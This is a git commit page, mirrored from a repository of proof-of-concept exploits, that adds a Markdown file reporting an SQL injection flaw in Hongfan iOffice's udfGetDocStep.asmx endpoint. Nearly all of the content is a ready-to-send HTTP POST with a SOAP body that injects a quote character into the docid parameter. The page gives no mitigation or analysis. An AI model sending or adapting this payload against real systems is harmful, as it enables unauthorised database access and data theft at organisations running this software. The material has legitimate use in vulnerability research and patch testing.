mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞.md
This commit is contained in:
parent
9f37db0e79
commit
a9a86c4874
18
红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞.md
Normal file
18
红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞.md
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
## 红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞
|
||||||
|
|
||||||
|
## POC
|
||||||
|
```
|
||||||
|
POST /ioffice/prg/interface/udfGetDocStep.asmx HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Content-Type: text/xml; charset=utf-8
|
||||||
|
SOAPAction: "http://tempuri.org/GetDocStep"
|
||||||
|
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
|
||||||
|
<soap:Body>
|
||||||
|
<GetDocStep xmlns="http://tempuri.org/">
|
||||||
|
<docid>1'</docid>
|
||||||
|
</GetDocStep>
|
||||||
|
</soap:Body>
|
||||||
|
</soap:Envelope>
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user